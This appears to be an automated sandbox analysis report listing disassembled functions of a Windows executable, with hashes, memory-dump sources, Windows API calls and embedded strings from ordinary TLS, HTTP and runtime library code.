                    • Opcode Fuzzy Hash: 7e2a670cbc3751083aca8d844e7b0d524f3d7b7a038902c5b21e05b7bc75484a
                    • Instruction Fuzzy Hash: C9414326B0864792FB10ABA5D4942BAA751FF44794FC00031D92DDB6CAEFBCE545C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=$_vfwprintf_l
                    • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 1392487457-995577734
                    • Opcode ID: 2a50b314edc6f43979e737df820437e0efbb8bb850c7ec20ac6bc0f10892b76a
                    • Instruction ID: 9997bb1c6e83512557f5f031c601543971a28002401d0a0a315d1777f4b32b97
                    • Opcode Fuzzy Hash: 2a50b314edc6f43979e737df820437e0efbb8bb850c7ec20ac6bc0f10892b76a
                    • Instruction Fuzzy Hash: A1414422B0868792EB10ABE5D4941FAA761FF54794FC00032DA2DD76DADFBCE545C3A0
                    APIs
                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F1302861
                    • GetLastError.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F130286F
                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F1302899
                    • FreeLibrary.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F1302907
                    • GetProcAddress.KERNEL32(?,?,?,00007FF7F1302A8E,?,?,?,00007FF7F1302780,?,?,?,00007FF7F12FF139), ref: 00007FF7F1302913
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Library$Load$AddressErrorFreeLastProc
                    • String ID: api-ms-
                    • API String ID: 2559590344-2084034818
                    • Opcode ID: 8624f1d6bf2c4c1a7a948945c122c0381f0908309d66990ca50ba45c37912b65
                    • Instruction ID: 51769aa72afb2263c9ee15df35c3b8d73313bd5ccf0d4f6221af19b49ba6655f
                    • Opcode Fuzzy Hash: 8624f1d6bf2c4c1a7a948945c122c0381f0908309d66990ca50ba45c37912b65
                    • Instruction Fuzzy Hash: 00310421B0A68683EF11AB06A800574ABD4FF44BA4F99013DED3D467D0EFBCE54583A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
                    • API String ID: 0-4153637960
                    • Opcode ID: 71013bad5970d87e38b486763537b573fbb0807149992ce27643df218a1bd120
                    • Instruction ID: f20b814148185698b9db705f2eb6c29073ea3c364bccde3e2602b55fd1c760c1
                    • Opcode Fuzzy Hash: 71013bad5970d87e38b486763537b573fbb0807149992ce27643df218a1bd120
                    • Instruction Fuzzy Hash: C2419131B0C78286EB24EB59E45437AA3A0FB88780F940036EA5D87BD5DF7CE501DB90
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
                    • FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B211
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B23E
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B24F
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B260
                    • SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Value$ErrorLast
                    • String ID:
                    • API String ID: 2506987500-0
                    • Opcode ID: f586135cfffe647547bb3e4373b707e49dc246ec9808e567d0f2f57b533476da
                    • Instruction ID: 5cfd71dd080980091e14d8312dd79a011d3b7084f5f1cad5535dc5189f08f412
                    • Opcode Fuzzy Hash: f586135cfffe647547bb3e4373b707e49dc246ec9808e567d0f2f57b533476da
                    • Instruction Fuzzy Hash: AE21AC20F0820283FB54B7B196551BDD2A25F487F0F96173CD93E26ADADFECA40242A1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 73155330-0
                    • Opcode ID: 1aff854877f73bb6f9236392da15bc26a5ee1d15a87ee2da434a669cd9ece3a6
                    • Instruction ID: d59e0bb0b94713e2a343ca88e72f1d487c58095233dba4d5fc4dd6451acf760e
                    • Opcode Fuzzy Hash: 1aff854877f73bb6f9236392da15bc26a5ee1d15a87ee2da434a669cd9ece3a6
                    • Instruction Fuzzy Hash: 8AA1D262B09A8185EF14EFA9E4443BDA250FB44BE0F948636DA7D87BC5DFBCD0618350
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ByteCharMultiStringWide
                    • String ID:
                    • API String ID: 2829165498-0
                    • Opcode ID: e063a6a851dc2f0eeb99db24af6bf3ae3605f48f6ea8b6139f840cea37463809
                    • Instruction ID: 8d63a0d8f0a9b94d30cc85ba8828fb50599c83ecac1ad23287f6b048e829ac6e
                    • Opcode Fuzzy Hash: e063a6a851dc2f0eeb99db24af6bf3ae3605f48f6ea8b6139f840cea37463809
                    • Instruction Fuzzy Hash: AB81B372B0874586EB20AF65E440269B3E1FF447A8F940235EA7D87BD8DFBCD4418790
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: 2286ac09ef35867ed1eb1894468d767ab9c51dcec0dff40988489e1ab873e3ce
                    • Instruction ID: 35b9b5d0579e61e0df263e28a31e2b7ee5e7d27d442344c56abcc515f33513d2
                    • Opcode Fuzzy Hash: 2286ac09ef35867ed1eb1894468d767ab9c51dcec0dff40988489e1ab873e3ce
                    • Instruction Fuzzy Hash: A1419422B09A4181EB14EB95E4406BDF360FF94BA0F944132DA6DC7AD5DFBCE495C3A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: d4eeb21a3c3b0fdefeabdc4af922a824d23d33150b978b6823d1010be6d3530a
                    • Instruction ID: 4e18ae6dda0e9db960f4397e923212b861e3760335f0958a23c7a45144e8114c
                    • Opcode Fuzzy Hash: d4eeb21a3c3b0fdefeabdc4af922a824d23d33150b978b6823d1010be6d3530a
                    • Instruction Fuzzy Hash: 2A318121B18A4285EB05BB99D44027DE351EF45BA0FC80132DA3DC76D5DFFCE4418BA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: b9c3c37a5bf06acded864643137a0966a1345521f3ccc449669df12f3de2075d
                    • Instruction ID: a16e0037006583a2aaa58262852b55a765d79129eb68258316a672b04c855b4a
                    • Opcode Fuzzy Hash: b9c3c37a5bf06acded864643137a0966a1345521f3ccc449669df12f3de2075d
                    • Instruction Fuzzy Hash: 8131B021B09A4291EB05FF99D800278E360FF44BA5FC81532DA3D876D5DFBCE44697A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: 2f2596f2634b75bb16c69e2c1d4a59297e3ecbae0e8f0959864bbce2d8889c0c
                    • Instruction ID: 607cd007a456d8df9370a68fa06f65ade83132e06f6072c5dcb186b5a9a93ede
                    • Opcode Fuzzy Hash: 2f2596f2634b75bb16c69e2c1d4a59297e3ecbae0e8f0959864bbce2d8889c0c
                    • Instruction Fuzzy Hash: 0731D025B19A8285EB05AB99D940278E3A0EF55BA4FC80235DA3CC76D5DFBCE441C3B0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: 4c06fa54008ae1450115ce03cc9cd4127756d11a96b3224315f2ca14ff275531
                    • Instruction ID: fb259a87554e0e59bde409f513b9219a2fbfbe721cb28d259086bb6667396114
                    • Opcode Fuzzy Hash: 4c06fa54008ae1450115ce03cc9cd4127756d11a96b3224315f2ca14ff275531
                    • Instruction Fuzzy Hash: 3C318626B0964281FB05FB99E840979E350EF45BA0F880135DA3D876D5DFFCE456D3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                    • String ID: csm$csm$csm
                    • API String ID: 3523768491-393685449
                    • Opcode ID: 1450e7910df2c53ba28fb358c1b498bf6a87ceeb2d52a8fa13b614ac39839cd1
                    • Instruction ID: 051aac51d06f4d76cb316176fd177a4a7a128c5d3b1f876d024cf913d7804dbd
                    • Opcode Fuzzy Hash: 1450e7910df2c53ba28fb358c1b498bf6a87ceeb2d52a8fa13b614ac39839cd1
                    • Instruction Fuzzy Hash: 05E1E273A087868AE710AF74D4802ACB7E0FF45788F55013ADAAD576DADF78E181C790
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B353
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B389
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B3B6
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B3C7
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B3D8
                    • SetLastError.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B3F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Value$ErrorLast
                    • String ID:
                    • API String ID: 2506987500-0
                    • Opcode ID: dce532b6b18bb86a58bf2bf6f37ac22d3fa730e69ce49d3211f4e3530c41c7d8
                    • Instruction ID: a1b5d5242d833c2ae7a7b6e725205be6229f36e70c53efa1bc702871159e0137
                    • Opcode Fuzzy Hash: dce532b6b18bb86a58bf2bf6f37ac22d3fa730e69ce49d3211f4e3530c41c7d8
                    • Instruction Fuzzy Hash: 52118120E0864283FB54B771565507DE1A26F447B0F961B3CE93E266DADFECA41242A1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: .$/$/$/
                    • API String ID: 356670603-2604304129
                    • Opcode ID: e25a8a3b45c1b40d5966a32284b60424917e25bcc7804ecb259e86d44553addb
                    • Instruction ID: 4a528eed3b4cc2888f14e63f0a8badebe072fd3bc57219a5b0a63ba3580577f0
                    • Opcode Fuzzy Hash: e25a8a3b45c1b40d5966a32284b60424917e25bcc7804ecb259e86d44553addb
                    • Instruction Fuzzy Hash: A1519611F0D2C345FF6167A494003799A915FA5B84FC9C135DABDCA7C6DFACE84283A2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: SSL shutdown timeout$select/poll on SSL socket, errno: %d$shutdown and remove SSL, done -> %d$shutdown and remove SSL, start
                    • API String ID: 1452528299-2396177677
                    • Opcode ID: b576131fc67ce8dc6753f437b066cf7bcccbfd615bf466cd8ef3c17111530857
                    • Instruction ID: c86647759c1d0ec1eae6b5b815289725248644399ea498277d3c6e46e1af3c6d
                    • Opcode Fuzzy Hash: b576131fc67ce8dc6753f437b066cf7bcccbfd615bf466cd8ef3c17111530857
                    • Instruction Fuzzy Hash: D851E322B087928AEB51AB66A50027AE790FF45BE0F840035DEAD877D5DF7CF451C7A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$getpeername
                    • String ID: accepted_set(sock=%qd, remote=%s port=%d)$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                    • API String ID: 664652874-3669066118
                    • Opcode ID: f7a87c730a5082ba3a492a382c2ac385aa401dfb44943d0296f624a942536a79
                    • Instruction ID: e53f60f2fa752c55782487bdc9bd1047dfa1f54ea50dada686cdd1b34fba3d73
                    • Opcode Fuzzy Hash: f7a87c730a5082ba3a492a382c2ac385aa401dfb44943d0296f624a942536a79
                    • Instruction Fuzzy Hash: 67518522B18BC286E720EF65E4403E9A360FB99784F805136DE9D47B96DFBCD185C790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastacceptclosesocketgetpeernamegetsocknameioctlsocket
                    • String ID: Connection accepted from server$Error accept()ing server connect
                    • API String ID: 623830651-1795061160
                    • Opcode ID: 671b54b0704aeef497317513256e6fa4aebbaa681d6a7258eb80f3e5227969bb
                    • Instruction ID: 0996a5b960678b531dd497a83606f07423875bfd02dd2319f11fadd839f13afe
                    • Opcode Fuzzy Hash: 671b54b0704aeef497317513256e6fa4aebbaa681d6a7258eb80f3e5227969bb
                    • Instruction Fuzzy Hash: 33319122708A4182E760EB55E4643AEB361FB497E4FC40235DEBD877D5CFACE5418790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: %s: %s$Expire Date$FALSE$Failed extracting certificate chain
                    • API String ID: 356670603-1145006616
                    • Opcode ID: e5193a71fbd77e7415084b522eabf649b5c018d75e81f5f31e2eca7ff4d5b9e7
                    • Instruction ID: 2adeebb2c0c42ceae484ed654422bb43437bd2116ea44edfa6439e672847010a
                    • Opcode Fuzzy Hash: e5193a71fbd77e7415084b522eabf649b5c018d75e81f5f31e2eca7ff4d5b9e7
                    • Instruction Fuzzy Hash: BC215062B0878745EB60AB95E4802F9A791FF44798FC00032DD2D9B6DADFBCE544C7A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 7753418e7f5b59b1857c2b44bf32ff681224de66c26ecb9a4b7354c23b7fd103
                    • Instruction ID: da6429b9d520d441325fa03ab2e2e0c8b15a5aa89bb7df3e18d4cd5349e72256
                    • Opcode Fuzzy Hash: 7753418e7f5b59b1857c2b44bf32ff681224de66c26ecb9a4b7354c23b7fd103
                    • Instruction Fuzzy Hash: A5F0C221B19B0783EB14AB20E8443799360EF99BB1FD5023DCA7E452E4CFADE045D3A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
